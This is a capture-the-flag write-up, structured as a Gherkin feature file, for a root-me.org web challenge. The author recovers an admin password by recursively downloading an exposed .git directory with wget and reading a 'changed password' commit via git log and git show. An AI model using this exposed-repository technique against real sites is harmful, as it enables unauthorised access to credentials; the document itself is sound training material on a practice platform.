## Version 2.0
## language: en

Feature:
  Site:
    root-me.org
  Category:
    Web server
  User:
    mr_once
  Goal:
    Get the password (in clear text) from the admin account.

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | ArchLinux            | 2020.06.01 |
    | Brave       | 1.10.97 |
    | wget |  1.20.3 |
    | git | 2.27.0 |
  Machine information:
    Given I have the url of the site
    And it looks like a login page
    And the clue of the challenge is the git documentation
    Then I try to exploit it

  Scenario: Fail: robots.txt and .htacces
    Given the loging area
    Then I try to check if robots.txt or .htacces are accesible
    And I see they are not

  Scenario: Fail: SQL injection
    Given the loging area
    Then I try some SQL injection on the form
    And I see the SQLi does not work

  Scenario: Success: git log and git show
    Given the clue of the challenge
    Then I go to .git
    And I see that it looks like the .git folder of a repo
    Then I download it with wget
    """
    wget --recursive http://challenge01.root-me.org/web-serveur/ch61/.git/
    """
    Then I go to that folder in the teminal and type
    """
    git log
    """
    Then I see it is actually a repo [evidence](gitlog.png)
    Then I see the commit message
    """
    commit a8673b295eca6a4fa820706d5f809f1a8b49fcba
    Author: John <john@bs-corp.com>
    Date:   Sun Sep 22 12:38:32 2019 +0200

    changed password
    """
    Then I take a look at that commit
    """
    git show a8673b295eca6a4fa820706d5f809f1a8b49fcba
    """
    And I see the new password [evidence](passwd.png)
    Then I solve the challenge
